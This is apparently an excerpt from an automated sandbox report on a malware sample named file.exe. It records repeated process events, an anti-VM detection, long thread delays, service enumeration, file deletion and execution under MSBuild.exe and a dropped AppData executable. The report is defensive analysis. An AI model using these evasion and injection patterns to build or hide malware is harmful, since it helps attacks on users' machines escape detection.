              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: DcBNSgyxoJFip.exe PID: 4864, type: MEMORYSTR
              Delayed program exit found
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0040E54F Sleep,ExitProcess,12_2_0040E54F
              Source: C:\Users\user\Desktop\file.exeMemory allocated: 13C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory allocated: 2EC0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory allocated: 2D30000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory allocated: 9130000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory allocated: A130000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory allocated: A340000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory allocated: B340000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory allocated: BAD0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory allocated: CAD0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory allocated: DAD0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeMemory allocated: 15B0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeMemory allocated: 2F00000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeMemory allocated: 2D50000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeMemory allocated: 8C70000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeMemory allocated: 9C70000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeMemory allocated: 9E60000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeMemory allocated: AE60000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeMemory allocated: B600000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeMemory allocated: C600000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeMemory allocated: D600000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_004198C2
              Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6347Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3462Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 672Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 9276Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI coverage: 5.1 %
              Source: C:\Users\user\Desktop\file.exe TID: 3884Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5396Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1592Thread sleep count: 672 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1592Thread sleep time: -2016000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1592Thread sleep count: 9276 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1592Thread sleep time: -27828000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe TID: 1088Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040B335
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,12_2_0041B42F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040B53A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0044D5E9 FindFirstFileExA,12_2_0044D5E9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,12_2_004089A9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00406AC2 FindFirstFileW,FindNextFileW,12_2_00406AC2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,12_2_00407A8C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00418C69
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,12_2_00408DA7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00406F06
              Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: MSBuild.exe, 00000007.00000002.4586156440.0000000000BC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
